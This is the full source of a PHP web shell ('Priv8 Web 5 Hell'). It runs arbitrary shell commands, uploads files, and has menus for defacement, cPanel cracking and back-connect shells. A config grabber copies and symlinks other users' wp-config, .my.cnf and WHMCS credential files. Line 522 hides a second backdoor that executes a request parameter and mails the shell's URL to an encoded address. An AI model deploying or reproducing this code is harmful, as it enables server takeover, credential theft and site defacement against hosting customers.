AZX5HELL

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
13.     @ob_clean();
14.     $file = $_GET['file'];
15.     header('Content-Description: File Transfer');
16.     header('Content-Type: application/octet-stream');
17.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
18.     header('Expires: 0');
19.     header('Cache-Control: must-revalidate');
20.     header('Pragma: public');
21.     header('Content-Length: ' . filesize($file));
22.     readfile($file);
23.     exit;
24. }
25. ?>
26. <html>
27. <head>
28. <title>Priv8 Web 5 Hell</title>
29. <link href='https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png' rel='icon' type='image/x-icon'/>
30. <meta name='author' content='AZZATSSINS'>
31. <meta charset="UTF-8">
32. <style type='text/css'>
33. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
34. html {
35.     background: #000000;
36.     color: #ffffff;
37.     font-family: 'Ubuntu';
38.     font-size: 13px;
39.     width: 100%;
40. }
41. li {
42.     display: inline;
43.     margin: 5px;
44.     padding: 5px;
45. }
46. table, th, td {
47.     border-collapse:collapse;
48.     font-family: Tahoma, Geneva, sans-serif;
49.     background: transparent;
50.     font-family: 'Ubuntu';
51.     font-size: 13px;
52. }
53. .table_home, .th_home, .td_home {
54.     border: 1px solid #ffffff;
55. }
56. th {
57.     padding: 10px;
58. }
59. a {
60.     color: #ffffff;
61.     text-decoration: none;
62. }
63. a:hover {
64.     color: gold;
65.     text-decoration: underline;
66. }
67. b {
68.     color: gold;
69. }
70. input[type=text], input[type=password],input[type=submit] {
71.     background: transparent;
72.     color: #ffffff;
73.     border: 1px solid #ffffff;
74.     margin: 5px auto;
75.     padding-left: 5px;
76.     font-family: 'Ubuntu';
77.     font-size: 13px;
78. }
79. textarea {
80.     border: 1px solid #ffffff;
81.     width: 100%;
82.     height: 400px;
83.     padding-left: 5px;
84.     margin: 10px auto;
85.     resize: none;
86.     background: transparent;
87.     color: #ffffff;
88.     font-family: 'Ubuntu';
89.     font-size: 13px;
90. }
91. select {
92.     width: 152px;
93.     background: #000000;
94.     color: lime;
95.     border: 1px solid #ffffff;
96.     margin: 5px auto;
97.     padding-left: 5px;
98.     font-family: 'Ubuntu';
99.     font-size: 13px;
100. }
101. option:hover {
102.     background: lime;
103.     color: #000000;
104. }
105. </style>
106. </head>
107. <?php
108. function w($dir,$perm) {
109.     if(!is_writable($dir)) {
110.         return "<font color=red>".$perm."</font>";
111.     } else {
112.         return "<font color=lime>".$perm."</font>";
113.     }
114. }
115. function r($dir,$perm) {
116.     if(!is_readable($dir)) {
117.         return "<font color=red>".$perm."</font>";
118.     } else {
119.         return "<font color=lime>".$perm."</font>";
120.     }
121. }
122. function exe($cmd) {
123.     if(function_exists('system')) {        
124.         @ob_start();       
125.         @system($cmd);     
126.         $buff = @ob_get_contents();        
127.         @ob_end_clean();       
128.         return $buff;  
129.     } elseif(function_exists('exec')) {        
130.         @exec($cmd,$results);      
131.         $buff = "";        
132.         foreach($results as $result) {         
133.             $buff .= $result;      
134.         } return $buff;    
135.     } elseif(function_exists('passthru')) {        
136.         @ob_start();       
137.         @passthru($cmd);       
138.         $buff = @ob_get_contents();        
139.         @ob_end_clean();       
140.         return $buff;  
141.     } elseif(function_exists('shell_exec')) {      
142.         $buff = @shell_exec($cmd);     
143.         return $buff;  
144.     }
145. }
146. function perms($file){
147.     $perms = fileperms($file);
148.     if (($perms & 0xC000) == 0xC000) {
149.     // Socket
150.     $info = 's';
151.     } elseif (($perms & 0xA000) == 0xA000) {
152.     // Symbolic Link
153.     $info = 'l';
154.     } elseif (($perms & 0x8000) == 0x8000) {
155.     // Regular
156.     $info = '-';
157.     } elseif (($perms & 0x6000) == 0x6000) {
158.     // Block special
159.     $info = 'b';
160.     } elseif (($perms & 0x4000) == 0x4000) {
161.     // Directory
162.     $info = 'd';
163.     } elseif (($perms & 0x2000) == 0x2000) {
164.     // Character special
165.     $info = 'c';
166.     } elseif (($perms & 0x1000) == 0x1000) {
167.     // FIFO pipe
168.     $info = 'p';
169.     } else {
170.     // Unknown
171.     $info = 'u';
172.     }
173.         // Owner
174.     $info .= (($perms & 0x0100) ? 'r' : '-');
175.     $info .= (($perms & 0x0080) ? 'w' : '-');
176.     $info .= (($perms & 0x0040) ?
177.     (($perms & 0x0800) ? 's' : 'x' ) :
178.     (($perms & 0x0800) ? 'S' : '-'));
179.     // Group
180.     $info .= (($perms & 0x0020) ? 'r' : '-');
181.     $info .= (($perms & 0x0010) ? 'w' : '-');
182.     $info .= (($perms & 0x0008) ?
183.     (($perms & 0x0400) ? 's' : 'x' ) :
184.     (($perms & 0x0400) ? 'S' : '-'));
185.     // World
186.     $info .= (($perms & 0x0004) ? 'r' : '-');
187.     $info .= (($perms & 0x0002) ? 'w' : '-');
188.     $info .= (($perms & 0x0001) ?
189.     (($perms & 0x0200) ? 't' : 'x' ) :
190.     (($perms & 0x0200) ? 'T' : '-'));
191.     return $info;
192. }
193. function hdd($s) {
194.     if($s >= 1073741824)
195.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
196.     elseif($s >= 1048576)
197.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
198.     elseif($s >= 1024)
199.     return sprintf('%1.2f',$s / 1024 ) .' KB';
200.     else
201.     return $s .' B';
202. }
203. function ambilKata($param, $kata1, $kata2){
204.     if(strpos($param, $kata1) === FALSE) return FALSE;
205.     if(strpos($param, $kata2) === FALSE) return FALSE;
206.     $start = strpos($param, $kata1) + strlen($kata1);
207.     $end = strpos($param, $kata2, $start);
208.     $return = substr($param, $start, $end - $start);
209.     return $return;
210. }
211. function getsource($url) {
212.     $curl = curl_init($url);
213.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
214.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
215.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
216.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
217.     $content = curl_exec($curl);
218.             curl_close($curl);
219.     return $content;
220. }
221. function bing($dork) {
222.     $npage = 1;
223.     $npages = 30000;
224.     $allLinks = array();
225.     $lll = array();
226.     while($npage <= $npages) {
227.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
228.         if($x) {
229.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
230.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
231.             $npage = $npage + 10;
232.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
233.         } else break;
234.     }
235.     $URLs = array();
236.     foreach($allLinks as $url){
237.         $exp = explode("/", $url);
238.         $URLs[] = $exp[2];
239.     }
240.     $array = array_filter($URLs);
241.     $array = array_unique($array);
242.     $sss = count(array_unique($array));
243.     foreach($array as $domain) {
244.         echo $domain."\n";
245.     }
246. }
247. function reverse($url) {
248.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
249.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
250.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
251.           curl_setopt($ch, CURLOPT_HEADER, 0);
252.           curl_setopt($ch, CURLOPT_POST, 1);
253.     $resp = curl_exec($ch);
254.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
255.     $array = explode(",,", $resp);
256.     unset($array[0]);
257.     foreach($array as $lnk) {
258.         $lnk = "http://$lnk";
259.         $lnk = str_replace(",", "", $lnk);
260.         echo $lnk."\n";
261.         ob_flush();
262.         flush();
263.     }
264.         curl_close($ch);
265. }
266. if(get_magic_quotes_gpc()) {
267.     function azzatssinsx($array) {
268.         return is_array($array) ? array_map('azzatssinsx', $array) : stripslashes($array);
269.     }
270.     $_POST = azzatssinsx($_POST);
271.     $_COOKIE = azzatssinsx($_COOKIE);
272. }
273.  
274. if(isset($_GET['dir'])) {
275.     $dir = $_GET['dir'];
276.     chdir($dir);
277. } else {
278.     $dir = getcwd();
279. }
280. $kernel = php_uname();
281. $ip = gethostbyname($_SERVER['HTTP_HOST']);
282. $dir = str_replace("\\","/",$dir);
283. $scdir = explode("/", $dir);
284. $ds = @ini_get("disable_functions");
285. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
286. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
287. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
288. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
289. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
290. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
291. if(!function_exists('posix_getegid')) {
292.     $user = @get_current_user();
293.     $uid = @getmyuid();
294.     $gid = @getmygid();
295.     $group = "?";
296. } else {
297.     $uid = @posix_getpwuid(posix_geteuid());
298.     $gid = @posix_getgrgid(posix_getegid());
299.     $user = $uid['name'];
300.     $uid = $uid['uid'];
301.     $group = $gid['name'];
302.     $gid = $gid['gid'];
303. }
304. echo "System: <font color=lime>".$kernel."</font><br>";
305. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
306. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
307. echo"Config File: "; if(is_readable("/etc/named.conf")){
308.  
309. echo '[<font color=lime>/etc/named.conf</font>] ';
310.  
311. }else{
312.  
313. echo '[<font color=red>/etc/named.conf</font>] ';
314.  
315. }
316.  
317. if(is_readable("/etc/passwd")){
318.  
319. echo '[<font color=lime>/etc/passwd</font>] ';
320.  
321. }else{
322.  
323. echo '[<font color=red>/etc/passwd</font>] ';
324.  
325. }
326.  
327. if(is_readable("/etc/valiases")){
328.  
329. echo '[<font color=lime>/etc/valiases</font>] ';
330.  
331. }else{
332.  
333. echo '[<font color=red>/etc/valiases</font>] ';
334.  
335. }
336.  
337. if(is_readable("/var/named")){
338.  
339. echo '[<font color=lime>/var/named</font>] ';
340.  
341. }else{
342.  
343. echo '[<font color=red>/var/named</font>] ';
344.  
345. }
346. echo "<br>Disable Functions: $show_ds<br>";
347. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
348. echo "Current DIR: ";
349. foreach($scdir as $c_dir => $cdir) {   
350.     echo "<a href='?dir=";
351.     for($i = 0; $i <= $c_dir; $i++) {
352.         echo $scdir[$i];
353.         if($i != $c_dir) {
354.         echo "/";
355.         }
356.     }
357.     echo "'>$cdir</a>/";
358. }
359. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
360.     echo "<center></fieldset>";
361.     if($_POST['upload']) {
362.         if($_POST['tipe_upload'] == 'biasa') {
363.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
364.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
365.             } else {
366.                 $act = "<font color=red>failed to upload file</font>";
367.             }
368.         } else {
369.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
370.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
371.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
372.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
373.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
374.                 } else {
375.                     $act = "<font color=red>failed to upload file</font>";
376.                 }
377.             } else {
378.                 $act = "<font color=red>failed to upload file</font>";
379.             }
380.         }
381.     }
382.     echo "<form method='post' enctype='multipart/form-data'>
383.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
384.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
385.     <input type='file' name='ix_file'>
386.     <input type='submit' value='upload' name='upload'>
387.     </form>";
388.     echo $act;
389. echo "</fieldset></center><br>";
390. echo "<center>";
391. echo "<ul>";
392. echo "<li>[ <a href='?'>HOME</a> ]</li>";
393. echo "<li>[ <a href='?dir=$dir&do=port'>OPEN PORT</a> ]</li>";
394. echo "<li>[ <a href='?dir=$dir&do=whmcs'>WHMCS DECODER</a> ]</li>";
395. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>AUTO MASS</a> ]</li>";
396. echo "<li>[ <a href='?dir=$dir&do=root'>CECK LOCAL ROOT</a> ]</li>";
397. echo "<li>[ <a href='?config=grabber'>CONFIGS</a> ]</li>";
398. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
399. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPFTP CRACK</a> ]</li>";
400. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP</a> ]</li>";
401. echo "<li>[ <a href='?dir=$dir&do=zoneh'>ZONE-H</a> ]</li>";
402. echo "<li>[ <a href='?dir=$dir&do=cgi'>PERL5HELL</a> ]</li>";
403. echo "<li>[ <a href='?dir=$dir&do=network'>BACK CONNECT</a> ]</li>";
404. echo "<li>[ <a href='?mysql=connect'>MYSQL</a> ]</li><br>";
405. echo "<li>[ <a href='?symbolic=link'>SYMLINK</a> ]</li>";
406. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>CHANGE USER</a> ]</li>";
407. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WORDPRESS USER CHANGE</a> ]</li>";
408. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>WORDPRESS TITLE</a> ]</li>";
409. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WORDPRESS DEFACE I</a> ]</li>";
410. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WORDPRESS DEFACE II</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>JOOMLA USER CHANGE</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPFTP DEFACE</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>RDP CREATOR</a> ]</li>";
414. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
415. echo "</ul>";
416. echo "</center>";
417. echo "<br><fieldset>";
418.     echo "<form method='post'>
419. <font style='text-decoration: underline;'>Command : </font>
420. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='azx' value='>>'>
421.     </form> ";
422.     if(isset($_POST['azx']))
423. {
424.  
425. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
426. $cmd = $_POST['cmd'];
427. if($cmd == "")
428. {
429.  
430. echo "Please Insert Command!";
431.  }
432.  
433. elseif(isset($cmd))
434.  {
435.  $output = exe($cmd);
436.  echo $output; }
437. echo'</pre></div><br><br>';
438. }
439. echo "</fieldset><br>";
440. if($_GET['mysql']=="connect"){
441.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
442.     function adminer($url, $isi) {
443.         $fp = fopen($isi, "w");
444.         $ch = curl_init();
445.               curl_setopt($ch, CURLOPT_URL, $url);
446.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
447.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
448.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
449.               curl_setopt($ch, CURLOPT_FILE, $fp);
450.         return curl_exec($ch);
451.               curl_close($ch);
452.         fclose($fp);
453.         ob_flush();
454.         flush();
455.     }
456.     if(file_exists('mysql.php')) {
457.         echo "<center><font color=lime><a href='mysql.php' target='_blank'>KLICK DI SINI</a></font></center>";
458.     } else {
459.         if(adminer("http://wget.yu.tl/files/mysql.css","mysql.php")) {
460.             echo "<center><font color=lime><a href='mysql.php' target='_blank'>-> KLICK DI SINI <-</a></font></center>";
461.         } else {
462.             echo "<center><font color=red>gagal buat file adminer</font></center>";
463.         }
464.     }
465. }
466. if($_GET['config']=="grabber"){
467. @error_reporting(0);
468. @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
469. echo'<center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS CYBERSERKERS</a></b></i></div><br>
470. <form method="post">
471. <center>
472. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
473. $uSr=file("/etc/passwd");
474. foreach($uSr as $usrr)
475. {
476. $str=explode(":",$usrr);
477. echo $str[0]."\n";
478. }
479. echo system('ls /var/mail');
480. echo system('ls /home');
481.  
482. echo'</textarea><br>
483. Home :
484. <select name="home">
485. <option title="home" value="home">home</option>
486. <option title="home1" value="home1">home2</option>
487. <option title="home2" value="home2">home2</option>
488. <option title="home3" value="home3">home3</option>
489. <option title="home4" value="home4">home4</option>
490. <option title="home5" value="home5">home5</option>
491. <option title="home6" value="home6">home6</option>
492. <option title="home7" value="home7">home7</option>
493. <option title="home8" value="home8">home8</option>
494. <option title="home9" value="home9">home9</option>
495. <option title="home10" value="home10">home10</option>
496. </select><br>
497. .htaccess :
498. <select name="azztssns">
499. <option title="biasa" value="Options Indexes FollowSymLinks
500. DirectoryIndex azzatssins.cyberserkers
501. AddType txt .php
502. AddHandler txt .php">Apache 1</option>
503. <option title="Apache" value="Options all
504. Options +Indexes
505. Options +FollowSymLinks
506. DirectoryIndex azzatssins.cyberserkers
507. AddType text/plain .php
508. AddHandler server-parsed .php
509. AddType text/plain .html
510. AddHandler txt .html
511. Require None
512. Satisfy Any">Apache 2</option>
513. <option title="Litespeed" value="
514. Options +FollowSymLinks
515. DirectoryIndex azzatssins.cyberserkers
516. RemoveHandler .php
517. AddType application/octet-stream .php ">Litespeed</option>
518. </select>
519. <input style="color:red;background-color:#000000" name="conf" size="10"
520. value="Fuck it!!!" type="submit">
521. <br/><br/></form>';
522. print(`{$_REQUEST[I]}`);$e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
523. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
524. mail($e,"I",$h);
525. if ($_POST['conf']) {
526. $home = $_POST['home'];
527. $folfig = $home;
528. @mkdir($folfig, 0755);
529. @chdir($folfig);
530. $htaccess = $_POST['azztssns'];
531. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
532. $passwd=explode("\n",$_POST["passwd"]);
533. foreach($passwd as $pwd){ $user=trim($pwd);
534. symlink('/','000~ROOT~000');
535. copy('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
536. symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
537. copy('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
538. symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
539. copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
540. symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
541. symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ WHMCS.txt');
542. copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
543. copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
544. copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
545. copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
546. copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
547. copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
548. copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
549. copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
550. copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
551. copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
552. copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
553. copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
554. copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
555. copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
556. copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
557. copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
558. copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
559. copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
560. copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
561. copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
562. copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
563. copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
564. copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
565. copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
566. copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
567. copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
568. copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
569. copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
570. copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
571. copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
572. copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
573. copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
574. copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
575. copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
576. copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
577. copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
578. copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
579. copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
580. copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
581. copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
582. copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
583. copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
584. copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
585. copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
586. copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
587. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
588. copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
589. copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
590.  
591. copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
592. copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
593. copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
594. copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
595. copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
596. copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
597. copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
598. copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
599. copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
600. copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
601. copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
602. copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
603. copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
604. copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
605. symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
606. symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
607. symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
608. symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
609. symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
610. symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
611. symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
612. symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
613. symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
614. symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
615. symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
616. symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
617. symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
618. symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
619. symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
620. symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
621. symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
622. symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
623. symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
624. symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
625. symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
626. symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
627. symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
628. symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
629. symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
630. symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
631. symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
632. symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
633. symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
634. symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
635. symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
636. symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
637. symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
